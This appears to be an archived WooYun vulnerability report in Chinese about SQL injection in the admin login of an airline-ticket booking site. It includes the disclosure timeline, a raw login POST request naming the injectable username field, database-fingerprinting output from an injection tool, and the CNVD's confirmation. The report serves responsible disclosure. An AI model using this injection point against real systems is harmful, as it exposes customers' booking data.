乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-23: 细节已通知厂商并且等待厂商处理中 2015-07-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-07-27: 细节向第三方安全合作伙伴开放 2015-09-17: 细节向核心白帽子及相关领域专家公开 2015-09-27: 细节向普通白帽子公开 2015-10-07: 细节向实习白帽子公开 2015-10-22: 细节向公众公开
RT
途在线隶属深圳市力天航空服务有限公司旗下网站,2006年2月 深圳市力天航空服务有限公司成立;**.**.**.**,**.**.**.**,**.**.**.**/,**.**.**.**,**.**.**.**,**.**.**.**/,**.**.**.**造成严重的用户订购机票信息泄漏,如被不法利用后果不堪。
POST /Manager/login.html HTTP/1.1Host: **.**.**.**Proxy-Connection: keep-aliveContent-Length: 56Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://**.**.**.**/Manager/login.html?url=http%3a%2f%2f**.**.**.**%2fAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: CNZZDATA2057746=cnzz_eid%3D850257133-1437130267-null%26ntime%3D1437380039; Hm_lvt_a35b1c9349029ebba4e706f709e378ff=1437353854,1437358912,1437381558,1437381564; Hm_lpvt_a35b1c9349029ebba4e706f709e378ff=1437383017url=http%3A%2F%2F**.**.**.**%2F&UserName=1&UserPass=1
注入参数username
[17:05:34] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008
转义
危害等级:高
漏洞Rank:13
确认时间:2015-07-24 15:34
CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。
暂无